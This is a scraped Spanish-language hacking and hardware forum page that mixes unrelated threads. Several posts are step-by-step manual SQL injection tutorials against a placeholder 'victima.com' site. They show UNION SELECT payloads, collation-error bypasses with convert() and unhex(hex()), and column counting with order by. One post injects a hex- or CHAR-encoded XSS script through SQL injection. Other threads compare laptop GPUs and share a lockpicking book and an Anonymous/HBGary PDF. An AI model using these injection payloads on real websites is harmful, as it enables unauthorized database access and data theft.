You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El método algo lento, pero para el que le gusta escribir bien. Sino use Havij! jejeje.
Saludos.

Claro el Havij es para automatizar todo esto pero hay gente que le interesa mas las inyecciones manuales ya que quieren entender a fondo todo lo que estan haciendo en vez de que una herramienta se lo haga por el.

Aca les dejo un tutorial de lockpicking de Syngress. Esta buenisimo ya que viene con imagenes ilustrativas para dar una explicacion detallada. Espero que les guste!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Aca les dejo el PDF que habla de Anonymous y su intrusion a HBGary y como el congreso empezo a preocuparse por ellos. Es una buena lectura y son solo 100 paginas. Espero que les guste!

Este es el link del libro: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Y aca esta el link para descargarlo:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Bueno supongamos que tenemos una inyeccion comun y ya sacamos las columnas vulnerables, ahi es cuando tratamos de encontrar la version y hacemos


www.victima.com/index.php?id=1 UNION SELECT 1,2,version(),4,5,6,7--

o sino

www.victima.com/index.php?id=1 UNION SELECT 1,2,@@version,4,5,6,7--

Ahi aparece el error de: "SQL Error : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

AUNQUE A VECES NO APARECE NADA CUANDO INTENTAMOS PONER VERSION() POR EJEMPLO ASI QUE SIGNIFICA QUE ES ESTE MISMO ERROR

Hay varias maneras de bypassear esto, algunas son:

Convert("comando" using latin1)

unhex(hex("comando"))

Ejemplos:

www.victima.com/index.php?id=1 UNION SELECT 1,2,convert(version() using latin1),4,5,6,7--

www.victima.com/index.php?id=1 UNION SELECT 1,2,unhex(hex(version())),4,5,6,7--

www.victima.com/index.php?id=1 UNION SELECT 1,2,convert(@@version using latin1)4,5,6,7--

LA INYECCION SE TIENE QUE SEGUIR HACIENDO DE ESA MANERA, POR EJEMPLO:

www.victima.com/index.php?id=1 UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7 FROM usuarios--

Espero que les haya gustado!

Para hacer una inyeccion XSS no persistente a travez de una inyeccion SQL hay que hacer lo siguiente:

Encontramos un sitio vulnerable

www.victima.com/index.php?id=1'

Luego hacemos un UNION con la cantidad de columnas (Ej: 6)

www.victima.com/index.php?id=1 UNION SELECT 1,2,3,4,5,6--

Ahi aparecen las columnas vulnerables, entonces es cuando inyectamos nuestro codigo

El original es

<script>alert("XSS");</script>

Pero hay que encodearlo en HEX o usar la funcion CHAR de MySQL

HEX ENCODED:

0x3c7363726970743e616c657274282258535322293b3c2f7363726970743e

MySQL CHAR:

CHAR(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62)

Espero que les haya gustado!

Supongamos que tenemos un sitio:

www.victima.com/index.php?ID=1'

Intentamos con el comando comun de

www.victima.com/index.php?ID=1+order+by+1--

No tenemos un error

Probamos con

www.victima.com/index.php?ID=1+order+by+10000--

No tenemos un error

Hay que hacer una string based injection

www.victima.com/index.php?ID=1'+order+by+1--+-

No tenemos error

Probamos con

www.victima.com/index.php?ID=1'+order+by+10--+-

TENEMOS ERROR!!

Entonces supongamos que probamos con

www.victima.com/index.php?ID=1'+order+by+9--+-

Y ahi no tenemos error o sea que son 9 columnas!

Entonces ahi seguimos como con una inyeccion normal

www.victima.com/index.php?ID=1'+union+select+1,2,3,4,5,6,7,8,9--+-

Bueno espero que les haya gustado!!

Aca les dejo un paper de la DEFCON 17 en inyecciones SQL avanzadas. Espero que les guste!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
MUY buena bro aunque sería bueno añadir más incluyendo a los crackers lammers ETC..

Claro pero esos ya no se considerarian hackers XD (los lammers) Aunque estaria bueno que los agregase igual.

Aca esta la mia XD




Nick: Abnormality
Tiempo: 48.578 s
Procesador: AMD Turion64 Mobile MK-36
Placa madre: Quanta 30D3
Cooler: Box de fabrica
Memoria: 1536MB,  633mhz ddr2 latencias 5-5-5-15
Link Screenshot: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ok ahora entendi.

Y entre una GTX 560M 3GB GDDR5
Y una           GTX 580M 2GB GDDR5

Cual de las dos seria la mejor?

Mira aca estan las caracteristicas de cada una:

GeForce GTX 580M

Especificaciones de la GPU:
*CUDA Cores   384
*Reloj del procesador (MHz)    1240
*Tasa de relleno de texturas (miles de millones/s)    39.7

Especificaciones de memoria:
*Reloj de la memoria (MHz)    1500
*Config. de memoria estándar    GDDR5
*Interfaz de memoria    256-bit
*Ancho de banda de memoria (GB/s.)    96

Funciones disponibles:
*NVIDIA SLI®-ready    
*NVIDIA PhysX™-ready    
*Tecnología NVIDIA CUDA™    
*Microsoft DirectX    11
*OpenGL    4.1
*Soporte de bus PCI-E 2.0
*Certificado para Windows 7    
*GeForce 3D Vision Ready    


GeForce GTX 560M

Especificaciones de la GPU:
*CUDA Cores    384
*Reloj del procesador (MHz)    1500
*Tasa de relleno de texturas (miles de millones/s)    36.8

Especificaciones de memoria:
*Reloj de la memoria (MHz)    1500
*Config. de memoria estándar    GDDR5
*Interfaz de memoria    Hasta 192-bit
*Ancho de banda de memoria (GB/s.)    Hasta 60

Funciones disponibles:
*NVIDIA SLI®-ready    2-way
*Tecnología NVIDIA Optimus    
*NVIDIA PhysX™-ready    
*Tecnología NVIDIA CUDA™    
*Microsoft DirectX    11
*OpenGL    4.1
*Soporte de bus    PCI-E 2.0
*Certificado para Windows 7    
*GeForce 3D Vision Ready

Te marque en rojo lo que diferencia a estos modelos.
Andan bien parejas, aunque la GTX580M tiene un ancho de banda de memoria mucho mas amplio (96 v/s 60 ), tambien la interfas de memoria es mas amplia (256 v/s 192).
Lo q tiene a favor la 560m es que el reloj del procesador es mas rapido.

En resumen van muy parejas, pero creo que la GTX 580m le gana por poco, ya q es mas nueva y por ende lleve mejor tecnologia. Si puedes pagar por una gtx 580m, seria genial.
Sino la gtx 560m te viene muy bien tambien.

Espero aclare en algo tu duda, aunque hay muchos conceptos a analizar.

Pd: Me motiva hacer una guia explicando todo lo que tiene que ver con las tarjetas de video, seria interesante xD.

Gracias por la explicacion detallada ^^ Tendrias que hacer una guia definitivamente! Especialmente para mi que no entiendo nada de hardware jajaja

Tengo un par de dudas mas pero ahora que te tengo en el msn te las pregunto! Gracias por la buena onda!! +Karma

Ok ahora entendi.

Y entre una GTX 560M 3GB GDDR5
Y una           GTX 580M 2GB GDDR5

Cual de las dos seria la mejor?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Porque seria eso? Contame un poco mas

Entre los 2 lo que marca la diferencia es el Disco duro y la ram.

*En disco tienes mas capacidad y un disco SSD (estos discos no tienen platos como los discos convencionales), son mucho mas rapidos incluso q los sata3.
Ese te serviria para dejar el sistema operativo y el de 750 para guardar toda tu informacion.

*En ram tienes el dobre, de 8gb a 16gb.

Si es por el mismo precio te conviene aprovechar tanto lo q tienes mas de disco, como lo q tienes mas de ram.

En lo estetico no es tanto ya q cuando juegas no miras lo bonito q es el pc sino lo bien q se ve el juego xD.

Otra cosa, los procesadores y la tarjeta de video son las mismas, como te comente antes la diferencia esta en disco y ram.
Con el solo hecho que lleve un SSD extra, te conviene 

Y que una tarjeta tenga 1.5GB y la otra 3GB cambia mucho?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

ASUS G74SX A2

Procesador:
2.00GHz Intel Core i7-2630QM Turbo Boost 2.90GHz (6MB Cache)

Display:
17.3 LED (1920 x 1080)

Disco Rigido:
910GB (1x750GB 7200rpm; 1x160GB SSD)

Memoria:
16GB DDR3 a 1333MHZ

Placa Video:
NVIDIA GeForce GTX 560M (3GB GDDR5)

Te recomiendo entre los 2 el ASUS G74SX A2 

Porque seria eso? Contame un poco mas

Corrupted: Esa fue la mejor customisacion que le pude hacer a la alienware para que el precio no se dispare hacia arriba

Cita de: [Corruptedyte link=topic=7484.msg25933#msg25933 date=1313797898]
Pues la verdad ay mismo te lo dice la assus trae mas recursos, pero la verdad yo escogeria la alienware esta mas bonita  jajajaja, ami me parece mejor la alienware  pero si trae mas recursos la asus ademas tambien depende del precio ?

El precio de las dos es el mismo. Lo que quiero saber es cual seria mejor para hacer gaming, no estoy interesado en cuanto al aspecto (aunque la alienware es HERMOSA <3)

Hola a todos, estoy por comprarme una computadora nueva y quisiera saber cual es mejor de estas dos para gaming o para tareas que requieran intensivos recursos,etc... Gracias!!


ASUS G74SX A2

Procesador:
2.00GHz Intel Core i7-2630QM Turbo Boost 2.90GHz (6MB Cache)

Display:
17.3 LED (1920 x 1080)

Disco Rigido:
910GB (1x750GB 7200rpm; 1x160GB SSD)

Memoria:
16GB DDR3 a 1333MHZ

Placa Video:
NVIDIA GeForce GTX 560M (3GB GDDR5)

Alienware M17x

Procesador:
Intel® Core™ i7 2630QM 2.0GHz (2.9GHz Turbo Mode, 6MB Cache)

Display:
17.3-inch WideFHD 1920x1080 120Hz WLED

Disco rigido:
750GB 7,200RPM HDD

Memoria:
8GB Dual Channel DDR3 at 1333MHz (4DIMMS)

Placa Video:
1.5GB GDDR5 NVIDIA GeForce GTX 560M




Bueno espero que puedan ayudarme!! Gracias!

About 102 sextillion years

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
ahhh creo que si, pero el tipo que esta sentado en la silla no se parece a el
salu2

Eso es verdad, la primera foto del PDF es de la pelicula Duro de matar 4, no?

Ahi lo bajo y lo leo, esa imagen puede que sea de Swordfish la pelicula?

Me salio Fedora y OpenSuSE. Igual los demas resultados eran compatibles todos con 95%. Mucho sentido no tiene. Todas eran perfectas para mi...?

En mi opinión personal es el zonealarm ya que es liviano (en cuanto a RAM) y ademas es muy fácil de usar.